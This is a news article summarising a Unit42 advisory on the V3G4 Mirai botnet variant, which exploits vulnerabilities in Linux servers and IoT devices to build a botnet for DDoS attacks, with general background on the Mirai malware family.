A new Mirai botnet variant, known as V3G4, is being used by attackers to target Internet of Things devices and Linux-based servers.

A New Mirai Botnet Is Used in Various Attacks

On February 15, 2023, Unit42 security researchers at Palo Alto Networks published an advisory about a new Mirai botnet variant, dubbed "V3G4". In the Unit42 post, readers were warned that various campaigns have used the botnet malware to carry out exploits, which were tracked between July and December 2022.

Overall, the malicious operator managed to exploit 13 security vulnerabilities, all of which could allow remote code execution to create a botnet. Unit42 wrote in its advisory that, upon remote code execution, "the wget and curl utilities are automatically executed to download Mirai client samples from malware infrastructure and then execute the downloaded bot clients."

Unit42 also informed readers that the same threat actor is suspected to be behind each attack. What's more, the threat actor used a racial slur in the attack, which was censored in the advisory. At the time of writing, no malicious service has been linked to the string of attacks.

Linux Servers and IoT Devices Have Been Targeted

digital graphic of various terms related to botnet
Image Credit: EpicTop10.com/Flickr

This new Mirai variant has been used to exploit IoT devices and Linux-based servers. In the aforementioned advisory, Unit42 wrote that V3G4 "targets exposed servers and networking devices running Linux", while also taking aim at IoT devices, to "conduct further attacks, such as distributed denial-of-service (DDoS) attacks."

Unit42 also wrote that "once the client establishes a connection with the C2 server, the threat actor can issue commands to the client to launch DDoS attacks." Botnets are commonly used in DDoS attacks to disrupt a server or website's typical stream of online traffic. This can cause the server or site to crash, making it temporarily inaccessible to regular users.

Mirai Malware Has Been a Threat for Years

Mirai botnet variants have been used numerous times in the past to launch malicious attacks since the emergence of the first Mirai program in 2016.

Many well-known platforms have been targeted using Mirai botnets, including Minecraft, Amazon, Netflix, and PayPal. There's no doubt that this family of malware poses a huge risk to online services.

Botnets Are Dangerous Yet Effective Attack Vectors

Creating a network of zombie devices to carry out malicious exploits is a sophisticated yet highly concerning method used by cybercriminals today, especially in DDoS attacks. We'll certainly see more kinds of botnet malware emerge in the future, possibly from Mirai's creators.